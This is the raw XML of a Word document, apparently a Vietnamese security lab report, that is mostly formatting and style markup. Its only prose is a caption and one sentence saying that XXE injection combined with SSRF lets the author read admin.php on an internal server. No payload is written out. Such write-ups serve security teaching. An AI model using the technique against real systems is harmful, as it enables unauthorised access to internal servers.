          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D7801">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26A5A544" wp14:editId="516E14C3">
            <wp:extent cx="5943600" cy="3237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37230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5841A366" w14:textId="133DAF05" w:rsidR="000D7801" w:rsidRDefault="000D7801" w:rsidP="000D7801">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Thực hiện khai thác XXE injection kết hợp với SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF0B1DD" w14:textId="77777777" w:rsidR="000D7801" w:rsidRDefault="000D7801" w:rsidP="000D7801">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01BA9C31" w14:textId="49EE6F00" w:rsidR="000D7801" w:rsidRPr="000D7801" w:rsidRDefault="000D7801" w:rsidP="000D7801">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Như ở trên ta có thể đọc được tệp admin.php trên máy chủ nội bộ thông qua lỗ hổng XXE và SSRF.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000D7801" w:rsidRPr="000D7801" w:rsidSect="005018C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50A12"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5222474E"/>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478106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B"/>
    <w:rsid w:val="000D3A4D"/>
    <w:rsid w:val="000D7801"/>
    <w:rsid w:val="00194C47"/>
    <w:rsid w:val="00266076"/>
    <w:rsid w:val="002C3388"/>
    <w:rsid w:val="002E062D"/>
    <w:rsid w:val="0046152F"/>
    <w:rsid w:val="00493083"/>
    <w:rsid w:val="004D0809"/>
    <w:rsid w:val="005018CB"/>
    <w:rsid w:val="00570B27"/>
    <w:rsid w:val="005A18BC"/>
    <w:rsid w:val="006F2E16"/>
    <w:rsid w:val="00776B20"/>
    <w:rsid w:val="00891348"/>
    <w:rsid w:val="00962964"/>
    <w:rsid w:val="009D71DA"/>
    <w:rsid w:val="009F5B2F"/>
    <w:rsid w:val="00A07031"/>
    <w:rsid w:val="00BD1E3F"/>
    <w:rsid w:val="00C241EF"/>
    <w:rsid w:val="00C77306"/>
    <w:rsid w:val="00C975A7"/>
    <w:rsid w:val="00D20594"/>
    <w:rsid w:val="00D27A60"/>
    <w:rsid w:val="00DE2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BC2A6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{64EBBF39-7A46-4B73-8C4B-E2C529C4F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8CB"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="005018CB"/>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5018CB"/>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5018CB"/>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5018CB"/>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5018CB"/>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5018CB"/>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5018CB"/>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5018CB"/>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5018CB"/>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8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18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8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8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8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8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8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8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8CB"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="005018C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5018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8CB"/>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5018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8CB"/>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5018CB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="005018CB"/>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5018CB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="005018C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5018CB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="005018CB"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C975A7"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C97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766315">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="291446636">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="305742627">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="458498993">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="506604684">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="786118758">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="790365265">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1114592413">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1346058769">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1374118895">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="162099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localhos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10</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vodanh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>vodanh</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-10T16:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-11T14:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>